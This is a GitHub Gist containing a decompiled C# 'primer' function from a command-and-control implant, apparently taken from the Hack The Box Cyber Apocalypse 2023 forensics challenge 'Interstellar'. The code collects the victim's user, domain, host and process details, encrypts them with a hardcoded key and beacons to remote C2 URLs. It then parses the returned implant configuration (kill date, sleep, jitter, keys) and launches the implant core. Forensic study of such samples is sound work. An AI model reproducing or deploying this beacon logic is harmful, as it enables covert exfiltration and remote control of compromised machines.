Created
March 23, 2023 20:04
-
-
Save khr0x40sh/476e350578b892efb6011d4a20e10048 to your computer and use it in GitHub Desktop.
HTB:CA2023 Forensics Interstellar Primer C2 Function
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Program | |
| // Token: 0x06000011 RID: 17 RVA: 0x000025C8 File Offset: 0x000007C8 | |
| private static void primer() | |
| { | |
| if (DateTime.ParseExact("2025-01-01", "yyyy-MM-dd", CultureInfo.InvariantCulture) > DateTime.Now) | |
| { | |
| Program.dfs = 0; | |
| string text = ""; | |
| try | |
| { | |
| text = WindowsIdentity.GetCurrent().Name; | |
| } | |
| catch | |
| { | |
| text = Environment.UserName; | |
| } | |
| if (Program.ihInteg()) | |
| { | |
| text += "*"; | |
| } | |
| string userDomainName = Environment.UserDomainName; | |
| string environmentVariable = Environment.GetEnvironmentVariable("COMPUTERNAME"); | |
| string environmentVariable2 = Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE"); | |
| int id = Process.GetCurrentProcess().Id; | |
| string processName = Process.GetCurrentProcess().ProcessName; | |
| Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir"); | |
| string text2 = null; | |
| string text3 = null; | |
| foreach (string text4 in Program.basearray) | |
| { | |
| string un = string.Format("{0};{1};{2};{3};{4};{5};1", new object[] | |
| { | |
| userDomainName, | |
| text, | |
| environmentVariable, | |
| environmentVariable2, | |
| id, | |
| processName | |
| }); | |
| string key = "DGCzi057IDmHvgTVE2gm60w8quqfpMD+o8qCBGpYItc="; | |
| text3 = text4; | |
| string address = text3 + "/Kettie/Emmie/Anni?Theda=Merrilee?c"; | |
| try | |
| { | |
| string enc = Program.GetWebRequest(Program.Encryption(key, un, false, null)).DownloadString(address); | |
| text2 = Program.Decryption(key, enc); | |
| break; | |
| } | |
| catch (Exception ex) | |
| { | |
| Console.WriteLine(string.Format(" > Exception {0}", ex.Message)); | |
| } | |
| Program.dfs++; | |
| } | |
| if (string.IsNullOrEmpty(text2)) | |
| { | |
| throw new Exception(); | |
| } | |
| Regex regex = new Regex("RANDOMURI19901(.*)10991IRUMODNAR"); | |
| Match match = regex.Match(text2); | |
| string randomURI = match.Groups[1].ToString(); | |
| regex = new Regex("URLS10484390243(.*)34209348401SLRU"); | |
| match = regex.Match(text2); | |
| string stringURLS = match.Groups[1].ToString(); | |
| regex = new Regex("KILLDATE1665(.*)5661ETADLLIK"); | |
| match = regex.Match(text2); | |
| string killDate = match.Groups[1].ToString(); | |
| regex = new Regex("SLEEP98001(.*)10089PEELS"); | |
| match = regex.Match(text2); | |
| string sleep = match.Groups[1].ToString(); | |
| regex = new Regex("JITTER2025(.*)5202RETTIJ"); | |
| match = regex.Match(text2); | |
| string jitter = match.Groups[1].ToString(); | |
| regex = new Regex("NEWKEY8839394(.*)4939388YEKWEN"); | |
| match = regex.Match(text2); | |
| string key2 = match.Groups[1].ToString(); | |
| regex = new Regex("IMGS19459394(.*)49395491SGMI"); | |
| match = regex.Match(text2); | |
| string stringIMGS = match.Groups[1].ToString(); | |
| Program.ImplantCore(text3, randomURI, stringURLS, killDate, sleep, key2, stringIMGS, jitter); | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment